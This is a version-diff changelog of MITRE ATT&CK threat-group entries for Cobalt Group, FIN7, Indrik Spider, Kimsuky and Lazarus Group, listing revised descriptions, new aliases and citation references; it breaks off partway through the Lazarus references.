external_references[10]['description']Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.
external_references[10]['url']https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/https://www.riskiq.com/blog/labs/cobalt-strike/
external_references[11]['source_name']Europol Cobalt Mar 2018RiskIQ Cobalt Jan 2018
external_references[11]['description']Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.
external_references[11]['url']https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spainhttps://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/
external_references[12]['source_name']Crowdstrike Global Threat Report Feb 2018Europol Cobalt Mar 2018
external_references[12]['description']CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.
external_references[12]['url']https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-reporthttps://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain
external_references[13]['source_name']Morphisec Cobalt Gang Oct 2018Secureworks GOLD KINGSWOOD September 2018
external_references[13]['description']Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.
external_references[13]['url']https://blog.morphisec.com/cobalt-gang-2.0https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish
x_mitre_version1.32.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesGOLD KINGSWOOD
external_references{'source_name': 'Crowdstrike Global Threat Report Feb 2018', 'description': 'CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.', 'url': 'https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report'}
external_references{'source_name': 'Morphisec Cobalt Gang Oct 2018', 'description': 'Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.', 'url': 'https://blog.morphisec.com/cobalt-gang-2.0'}

[G0046] FIN7

Current version: 2.0

Version changed from: 1.5 → 2.0


Old Description
New Description
t1[FIN7](https://attack.mitre.org/groups/G0046) is a financialt1[FIN7](https://attack.mitre.org/groups/G0046) is a financial
>ly-motivated threat group that has primarily targeted the U.>ly-motivated threat group that has been active since 2013 pr
>S. retail, restaurant, and hospitality sectors since mid-201>imarily targeting the U.S. retail, restaurant, and hospitali
>5. They often use point-of-sale malware. A portion of [FIN7]>ty sectors, often using point-of-sale malware. A portion of 
>(https://attack.mitre.org/groups/G0046) was run out of a fro>[FIN7](https://attack.mitre.org/groups/G0046) was run out of
>nt company called Combi Security. [FIN7](https://attack.mitr> a front company called Combi Security. Since 2020 [FIN7](ht
>e.org/groups/G0046) is sometimes referred to as [Carbanak](h>tps://attack.mitre.org/groups/G0046) shifted operations to a
>ttps://attack.mitre.org/groups/G0008) Group, but these appea> big game hunting (BGH) approach including use of [REvil](ht
>r to be two groups using the same [Carbanak](https://attack.>tps://attack.mitre.org/software/S0496) ransomware and their 
>mitre.org/software/S0030) malware and are therefore tracked >own Ransomware as a Service (RaaS), Darkside. [FIN7](https:/
>separately. (Citation: FireEye FIN7 March 2017) (Citation: F>/attack.mitre.org/groups/G0046) may be linked to the [Carban
>ireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 201>ak](https://attack.mitre.org/groups/G0008) Group, but there 
>7) (Citation: FireEye FIN7 Aug 2018)>appears to be several groups using [Carbanak](https://attack
 >.mitre.org/software/S0030) malware and are therefore tracked
 > separately.(Citation: FireEye FIN7 March 2017)(Citation: Fi
 >reEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)
 >(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carb
 >on Spider August 2021)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
external_referenceshttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
external_referenceshttps://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 18:47:28.215000+00:002021-10-19 00:02:08.486000+00:00
description[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. [FIN7](https://attack.mitre.org/groups/G0046) is sometimes referred to as [Carbanak](https://attack.mitre.org/groups/G0008) Group, but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018)[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)
external_references[2]['source_name']FireEye FIN7 March 2017GOLD NIAGARA
external_references[2]['description']Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.(Citation: Secureworks GOLD NIAGARA Threat Profile)
external_references[3]['source_name']FireEye FIN7 April 2017ITG14
external_references[3]['description']Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.ITG14 shares campaign overlap with FIN7.(Citation: IBM Ransomware Trends September 2020)
external_references[4]['source_name']FireEye CARBANAK June 2017Carbon Spider
external_references[4]['description']Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.(Citation: CrowdStrike Carbon Spider August 2021)
external_references[5]['source_name']FireEye FIN7 Aug 2018FireEye FIN7 March 2017
external_references[5]['description']Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.htmlhttps://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
external_references[6]['source_name']Morphisec FIN7 June 2017FireEye FIN7 April 2017
external_references[6]['description']Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
external_references[6]['url']http://blog.morphisec.com/fin7-attacks-restaurant-industryhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
external_references[7]['source_name']FireEye FIN7 Shim DatabasesFireEye CARBANAK June 2017
external_references[7]['description']Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.htmlhttps://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html
x_mitre_version1.52.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesGOLD NIAGARA
aliasesITG14
aliasesCarbon Spider
external_references{'source_name': 'FireEye FIN7 Aug 2018', 'description': 'Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html'}
external_references{'source_name': 'CrowdStrike Carbon Spider August 2021', 'description': 'Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.', 'url': 'https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/'}
external_references{'source_name': 'Morphisec FIN7 June 2017', 'description': 'Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.', 'url': 'http://blog.morphisec.com/fin7-attacks-restaurant-industry'}
external_references{'source_name': 'FireEye FIN7 Shim Databases', 'description': 'Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.', 'url': 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html'}
external_references{'source_name': 'Secureworks GOLD NIAGARA Threat Profile', 'description': 'CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.', 'url': 'https://www.secureworks.com/research/threat-profiles/gold-niagara'}
external_references{'source_name': 'IBM Ransomware Trends September 2020', 'description': 'Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.', 'url': 'https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/'}

[G0119] Indrik Spider

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[Indrik Spider](https://attack.mitre.org/groups/G0119) is a t1[Indrik Spider](https://attack.mitre.org/groups/G0119) is a 
>financially motivated threat group that has leveraged the Dr>Russia-based cybercriminal group that as been active since a
>idex banking trojan since at least June 2014 and delivered r>t least 2014. [Indrik Spider](https://attack.mitre.org/group
>ansomware variants since 2017.(Citation: Crowdstrike Indrik >s/G0119) initially started with the [Dridex](https://attack.
>November 2018) >mitre.org/software/S0384) banking Trojan, and then by 2017 t
 >hey began running ransomware operations using [BitPaymer](ht
 >tps://attack.mitre.org/software/S0570), [WastedLocker](https
 >://attack.mitre.org/software/S0612), and Hades ransomware.(C
 >itation: Crowdstrike Indrik November 2018)(Citation: Crowdst
 >rike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 20
 >19)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 02:00:43.762000+00:002021-10-15 16:14:32.314000+00:00
description[Indrik Spider](https://attack.mitre.org/groups/G0119) is a financially motivated threat group that has leveraged the Dridex banking trojan since at least June 2014 and delivered ransomware variants since 2017.(Citation: Crowdstrike Indrik November 2018) [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that as been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)
external_references[1]['source_name']Crowdstrike Indrik November 2018Evil Corp
external_references[1]['description']Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesEvil Corp
external_references{'source_name': 'Crowdstrike Indrik November 2018', 'description': 'Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.', 'url': 'https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/'}
external_references{'source_name': 'Crowdstrike EvilCorp March 2021', 'description': 'Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021.', 'url': 'https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/'}
external_references{'source_name': 'Treasury EvilCorp Dec 2019', 'description': 'U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.', 'url': 'https://home.treasury.gov/news/press-releases/sm845'}

[G0094] Kimsuky

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[Kimsuky](https://attack.mitre.org/groups/G0094) is a North t1[Kimsuky](https://attack.mitre.org/groups/G0094) is a North 
>Korean-based threat group that has been active since at leas>Korea-based cyber espionage group that has been active since
>t September 2013. The group initially focused on targeting K> at least 2012. The group initially focused on targeting Sou
>orean think tanks and DPRK/nuclear-related targets, expandin>th Korean government entities, think tanks, and individuals 
>g recently to the United States, Russia, and Europe. The gro>identified as experts in various fields, and expanded its op
>up was attributed as the actor behind the Korea Hydro & Nucl>erations to include the United States, Russia, Europe, and t
>ear Power Co. compromise.(Citation: EST Kimsuky April 2019)(>he UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has 
>Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsu>focused its intelligence collection activities on foreign po
>ky November 2020)>licy and national security issues related to the Korean peni
 >nsula, nuclear policy, and sanctions.(Citation: EST Kimsuky 
 >April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybe
 >reason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky
 > June 2021)(Citation: CISA AA20-301A Kimsuky)  [Kimsuky](htt
 >ps://attack.mitre.org/groups/G0094) was assessed to be respo
 >nsible for the 2014 Korea Hydro & Nuclear Power Co. compromi
 >se; other notable campaigns include Operation STOLEN PENCIL 
 >(2018), Operation Kabar Cobra (2019), and Operation Smoke Sc
 >reen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Cita
 >tion: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab K
 >imsuky Kabar Cobra Feb 2019)  North Korean group definitions
 > are known to have significant overlap, and some security re
 >searchers report all North Korean state-sponsored cyber acti
 >vity under the name [Lazarus Group](https://attack.mitre.org
 >/groups/G0032) instead of tracking clusters or subgroups.
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://blog.alyac.co.kr/2234
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 02:34:44.299000+00:002021-10-14 22:35:20.109000+00:00
description[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korean-based threat group that has been active since at least September 2013. The group initially focused on targeting Korean think tanks and DPRK/nuclear-related targets, expanding recently to the United States, Russia, and Europe. The group was attributed as the actor behind the Korea Hydro & Nuclear Power Co. compromise.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky) [Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
external_references[1]['description'](Citation: Securelist Kimsuky Sept 2013)(Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021)
external_references[2]['source_name']ThalliumSTOLEN PENCIL
external_references[2]['description'](Citation: Cybereason Kimsuky November 2020)(Citation: Netscout Stolen Pencil Dec 2018)
external_references[3]['source_name']Black BansheeThallium
external_references[3]['description'](Citation: Cybereason Kimsuky November 2020)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)
external_references[4]['source_name']Velvet ChollimaBlack Banshee
external_references[4]['description'](Citation: Zdnet Kimsuky Dec 2018)(Citation: ThreatConnect Kimsuky September 2020)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)
external_references[5]['source_name']EST Kimsuky April 2019Velvet Chollima
external_references[5]['description']Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.(Citation: Zdnet Kimsuky Dec 2018)(Citation: ThreatConnect Kimsuky September 2020)(Citation: Malwarebytes Kimsuky June 2021)
external_references[6]['source_name']BRI Kimsuky April 2019EST Kimsuky April 2019
external_references[6]['description']BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.
external_references[6]['url']https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/https://blog.alyac.co.kr/2234
external_references[7]['source_name']Cybereason Kimsuky November 2020BRI Kimsuky April 2019
external_references[7]['description']Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.
external_references[7]['url']https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suitehttps://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/
external_references[8]['source_name']Securelist Kimsuky Sept 2013Cybereason Kimsuky November 2020
external_references[8]['description']Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019.Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.
external_references[8]['url']https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite
external_references[9]['source_name']Zdnet Kimsuky Dec 2018Malwarebytes Kimsuky June 2021
external_references[9]['description']Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.
external_references[9]['url']https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/
external_references[10]['source_name']ThreatConnect Kimsuky September 2020CISA AA20-301A Kimsuky
external_references[10]['description']ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.
external_references[10]['url']https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/https://us-cert.cisa.gov/ncas/alerts/aa20-301a
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSTOLEN PENCIL
external_references{'source_name': 'Netscout Stolen Pencil Dec 2018', 'description': 'ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.', 'url': 'https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/'}
external_references{'source_name': 'EST Kimsuky SmokeScreen April 2019', 'description': 'ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021.', 'url': 'https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf'}
external_references{'source_name': 'AhnLab Kimsuky Kabar Cobra Feb 2019', 'description': 'AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.', 'url': 'https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf'}
external_references{'source_name': 'Securelist Kimsuky Sept 2013', 'description': 'Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019.', 'url': 'https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/'}
external_references{'source_name': 'Zdnet Kimsuky Dec 2018', 'description': 'Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.', 'url': 'https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/'}
external_references{'source_name': 'ThreatConnect Kimsuky September 2020', 'description': 'ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.', 'url': 'https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/'}

[G0032] Lazarus Group

Current version: 2.0

Version changed from: 1.5 → 2.0


Old Description
New Description
t1[Lazarus Group](https://attack.mitre.org/groups/G0032) is a t1[Lazarus Group](https://attack.mitre.org/groups/G0032) is a 
>threat group that has been attributed to the North Korean go>North Korean state-sponsored cyber threat group that has bee
>vernment.(Citation: US-CERT HIDDEN COBRA June 2017) The grou>n attributed to the Reconnaissance General Bureau.(Citation:
>p has been active since at least 2009 and was reportedly res> US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Ko
>ponsible for the November 2014 destructive wiper attack agai>rean Cyber Groups September 2019) The group has been active 
>nst Sony Pictures Entertainment as part of a campaign named >since at least 2009 and was reportedly responsible for the N
>Operation Blockbuster by Novetta. Malware used by [Lazarus G>ovember 2014 destructive wiper attack against Sony Pictures 
>roup](https://attack.mitre.org/groups/G0032) correlates to o>Entertainment as part of a campaign named Operation Blockbus
>ther reported campaigns, including Operation Flame, Operatio>ter by Novetta. Malware used by [Lazarus Group](https://atta
>n 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.>ck.mitre.org/groups/G0032) correlates to other reported camp
> (Citation: Novetta Blockbuster) In late 2017, [Lazarus Grou>aigns, including Operation Flame, Operation 1Mission, Operat
>p](https://attack.mitre.org/groups/G0032) used KillDisk, a d>ion Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novett
>isk-wiping tool, in an attack against an online casino based>a Blockbuster)  North Korean group definitions are known to 
> in Central America. (Citation: Lazarus KillDisk)  North Kor>have significant overlap, and some security researchers repo
>ean group definitions are known to have significant overlap,>rt all North Korean state-sponsored cyber activity under the
> and the name [Lazarus Group](https://attack.mitre.org/group> name [Lazarus Group](https://attack.mitre.org/groups/G0032)
>s/G0032) is known to encompass a broad range of activity. So> instead of tracking clusters or subgroups, such as [Andarie
>me organizations use the name Lazarus Group to refer to any >l](https://attack.mitre.org/groups/G0138), [APT37](https://a
>activity attributed to North Korea.(Citation: US-CERT HIDDEN>ttack.mitre.org/groups/G0067), [APT38](https://attack.mitre.
> COBRA June 2017) Some organizations track North Korean clus>org/groups/G0082), and [Kimsuky](https://attack.mitre.org/gr
>ters or groups such as Bluenoroff,(Citation: Kaspersky Lazar>oups/G0094).   
>us Under The Hood Blog 2017) [APT37](https://attack.mitre.or 
>g/groups/G0067), and [APT38](https://attack.mitre.org/groups 
>/G0082) separately, while other organizations may track some 
> activity associated with those group names by the name Laza 
>rus Group. 
Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-18 16:34:25.941000+00:002021-10-14 22:04:58.182000+00:00
description[Lazarus Group](https://attack.mitre.org/groups/G0032) is a threat group that has been attributed to the North Korean government.(Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) In late 2017, [Lazarus Group](https://attack.mitre.org/groups/G0032) used KillDisk, a disk-wiping tool, in an attack against an online casino based in Central America. (Citation: Lazarus KillDisk) North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).
external_references[7]['source_name']Novetta BlockbusterTreasury North Korean Cyber Groups September 2019
external_references[7]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.
external_references[7]['url']https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdfhttps://home.treasury.gov/news/press-releases/sm774
external_references[8]['source_name']Lazarus KillDiskNovetta Blockbuster
external_references[8]['description']Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
external_references[8]['url']https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
external_references[9]['source_name']Kaspersky Lazarus Under The Hood Blog 2017US-CERT HOPLIGHT Apr 2019
external_references[9]['description']GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
external_references[9]['url']https://securelist.com/lazarus-under-the-hood/77908/https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
external_references[10]['source_name']US-CERT HOPLIGHT Apr 2019Microsoft ZINC disruption Dec 2017
external_references[10]['description']US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.
external_references[10]['url']https://www.us-cert.gov/ncas/analysis-reports/AR19-100Ahttps://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/
external_references[11]['source_name']Microsoft ZINC disruption Dec 2017Secureworks NICKEL ACADEMY Dec 2017
